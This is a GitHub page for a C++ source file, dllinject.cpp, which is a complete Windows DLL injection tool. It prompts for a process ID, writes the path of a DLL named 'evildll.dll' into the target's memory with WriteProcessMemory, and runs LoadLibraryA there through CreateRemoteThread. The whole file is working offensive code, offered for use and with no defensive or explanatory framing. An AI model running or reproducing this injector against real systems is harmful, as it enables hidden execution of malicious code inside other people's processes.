-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathdllinject.cpp
More file actions
65 lines (37 loc) · 1.42 KB
/
dllinject.cpp
File metadata and controls
65 lines (37 loc) · 1.42 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
#include <windows.h>
#include <iostream>
using namespace std;
char toDLL[] = "C:\\path\\to\\evildll.dll"; //Replace with the path to your evildll.cpp
int pid;
HANDLE hprocess;
LPVOID paddress;
HMODULE hModule;
FARPROC pLoadLibrary;
HANDLE procThread;
int main(){
cout << "[?] What is the PID of the Process you want to inject?: ";
cin >> pid;
hprocess = OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM_WRITE|PROCESS_VM_OPERATION, true, pid);
if(hprocess == NULL){
cout << "[!] Could not get Process Handle on the given PID";
return 1;
}
paddress = VirtualAllocEx(hprocess, nullptr, strlen(toDLL) + 1, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if(paddress == NULL){
cout << "[!] Could not allocate space on to the virtual address of the given PID";
return 1;
}
hModule = GetModuleHandleW(L"kernel32.dll");
pLoadLibrary = GetProcAddress(hModule, "LoadLibraryA");
if(!WriteProcessMemory(hprocess, paddress, toDLL, strlen(toDLL) + 1, NULL)){
cout << "[!] Could not write into the memory of the given PID";
return 1;
}
procThread = CreateRemoteThread(hprocess, nullptr, 0, (LPTHREAD_START_ROUTINE)pLoadLibrary, paddress, 0, NULL);
if(procThread == NULL){
cout << "[!] Could not create remote thread on the given PID";
return 1;
}
cout << "[+] DLL successfully injected!";
return 0;
}